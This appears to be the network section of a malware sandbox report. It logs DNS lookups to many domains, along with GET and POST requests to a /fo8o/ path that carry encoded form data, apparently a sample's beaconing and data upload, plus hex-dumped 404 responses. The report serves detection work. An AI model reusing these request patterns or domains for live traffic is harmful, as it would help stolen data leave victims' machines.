Source: global traffic	HTTP traffic detected: GET /fo8o/?pnGX8L3p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Source: global traffic	DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic	DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic	DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic	DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic	DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic	DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic	DNS traffic detected: DNS query: www.techchains.info
Source: global traffic	DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic	DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic	DNS traffic detected: DNS query: www.660danm.top
Source: global traffic	DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic	DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.k9vyp11no3.cfd
Source: global traffic	DNS traffic detected: DNS query: www.shenzhoucui.com

Source: unknown

HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 213Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 70 6e 47 58 38 4c 33 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4f 7a 42 6a 36 4a 36 37 6b 76 66 53 54 37 30 43 57 78 57 66 67 72 67 58 30 55 65 42 5a 37 65 4f 56 45 76 6b 57 45 76 75 30 41 64 Data Ascii: pnGX8L3p=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOOzBj6J67kvfST70CWxWfgrgX0UeBZ7eOVEvkWEvu0Ad

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Jan 2025 07:28:32 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 15 Jan 2025 07:28:55 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 15 Jan 2025 07:28:58 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 15 Jan 2025 07:29:00 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 15 Jan 2025 07:29:03 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:30:58 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:01 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:03 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:06 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:11 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:14 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data 